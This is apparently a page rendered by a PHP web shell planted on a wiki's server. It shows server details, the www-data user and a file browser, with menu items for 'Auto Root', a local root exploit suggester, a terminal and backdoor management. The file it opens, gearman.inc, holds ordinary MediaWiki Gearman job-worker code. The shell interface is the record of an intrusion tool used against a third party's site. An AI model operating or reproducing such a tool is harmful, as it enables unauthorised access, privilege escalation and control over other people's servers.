Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
wiki.bernardino.org /
maintenance /
gearman /
Delete
Unzip
Name
Size
Permission
Date
Action
gearman.inc
2.61
KB
-rw-r--r--
2010-10-14 22:53
gearmanRefreshLinks.php
1.04
KB
-rw-r--r--
2010-05-22 18:50
gearmanWorker.php
1.01
KB
-rw-r--r--
2011-04-20 02:12
Save
Rename
<?php require( 'Net/Gearman/Client.php' ); require( 'Net/Gearman/Worker.php' ); class MWGearmanJob extends Net_Gearman_Job_Common { function switchWiki( $wiki, $params ) { echo "Switching to $wiki\n"; # Pretend that we have completed it right now, because the new process won't do it $this->complete( array( 'result' => true ) ); socket_close( $this->conn ); # Close some more sockets LBFactory::destroyInstance(); global $wgMemc; $wgMemc->disconnect_all(); # Find PHP $php = readlink( '/proc/' . posix_getpid() . '/exe' ); # Run the worker script $args = array( $_SERVER['PHP_SELF'], '--wiki', $wiki, '--fake-job', serialize( $params ) ); $args = array_merge( $args, $GLOBALS['args'] ); pcntl_exec( $php, $args, $_ENV ); echo "Error running exec\n"; } function run( $params ) { if ( wfWikiID() !== $params['wiki'] ) { $this->switchWiki( $params['wiki'], $params ); } return self::runNoSwitch( $params ); } static function runNoSwitch( $params ) { echo implode( ' ', $params ) . "\n"; $title = Title::newFromText( $params['title'] ); $mwJob = Job::factory( $params['command'], $title, $params['params'] ); return $mwJob->run(); } } class NonScaryGearmanWorker extends Net_Gearman_Worker { /** * Copied from Net_Gearman_Worker but with the scary "run any PHP file in * the filesystem" feature removed. */ protected function doWork($socket) { Net_Gearman_Connection::send($socket, 'grab_job'); $resp = array('function' => 'noop'); while (count($resp) && $resp['function'] == 'noop') { $resp = Net_Gearman_Connection::blockingRead($socket); } if (in_array($resp['function'], array('noop', 'no_job'))) { return false; } if ($resp['function'] != 'job_assign') { throw new Net_Gearman_Exception('Holy Cow! What are you doing?!'); } $name = $resp['data']['func']; $handle = $resp['data']['handle']; $arg = array(); if (isset($resp['data']['arg']) && Net_Gearman_Connection::stringLength($resp['data']['arg'])) { $arg = json_decode($resp['data']['arg'], true); } ### START MW DIFFERENT BIT if ( $name != 'mw_job' ) { throw new Net_Gearman_Job_Exception('Invalid function'); } $job = new MWGearmanJob($socket, $handle); ### END MW DIFFERENT BIT try { $this->start($handle, $name, $arg); $res = $job->run($arg); if (!is_array($res)) { $res = array('result' => $res); } $job->complete($res); $this->complete($handle, $name, $res); } catch (Net_Gearman_Job_Exception $e) { $job->fail(); $this->fail($handle, $name, $e); } // Force the job's destructor to run $job = null; return true; } }